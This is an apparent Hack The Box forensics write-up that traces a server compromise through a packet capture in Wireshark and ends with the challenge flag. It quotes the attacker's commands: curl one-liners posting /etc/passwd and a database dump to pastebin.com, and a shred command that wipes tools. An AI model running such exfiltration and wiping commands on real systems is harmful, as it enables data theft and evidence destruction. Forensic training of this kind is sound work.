Write-up author: jon-brandy
The security team was alerted to suspicous network activity from a production web server. Can you determine if any data was stolen and what it was?
- NONE
- First, unzip the
.zip
file given.
RESULT
- Open the
.pcap
file in wireshark.
- Now let's follow the
tcp
stream. - When i followed the 2nd tcp stream. Got a clue here.
- Based from it we know that the attacker checked connectivity to a database server, then used a script named exfildb.sh to dump the remote database.
./exfildb.sh mysql-m1.prod.htb 3306 root p4ssw0rd dbdump
- Then the attacker tried to upload the contents of
etc/passwd
to pastebin.com using curl.
pastetext=$(cat /etc/passwd) ; curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php'
- Seems like the attacker tried to upload contents of
etc/passwd
again.
- Next, the attacker used head to check the first four lines of the
dumpdb
file.
- Then he used curl again to upload the database of pastebin.com.
pastetext=$(cat dumpdb) ; curl -d "api_user_key=ed67c1aec48d47270dd002d0baa29814&api_dev_key=bb8aa307a7d4b6073976149b65977bae&api_paste_private=2&api_option=paste&api_paste_code=${pastetext}" 'https://pastebin.com/api/api_post.php'
- After that, the attacker tried to remove all the tools and dumped database from
tmp/.h4x
directory.
find /tmp/.h4x -type f -exec shred -vfun2 {} \;
- The next thing to do is to check what was uploaded to pastebin.com.
- First, we need to upload the
secrets.log
file we got from extracting the zip file as the TLS (Pre)-Master-Secret log filename, because we want to decrypt the encrypted HTTPS traffic.
STEPS
Go to edit -> preferences -> protocols -> TLS -> upload.
- Now let's filter the http stream which has pastebin.com as the host.
COMMAND
http.host=="pastebin.com"
RESULT
- After follow the 1st and the 2nd HTTP stream, i got nothing useful.
- But when i followed the 3rd one, i got the flag!
HTB{Th15_15_4_F3nD3r_Rh0d35_M0m3NT!!}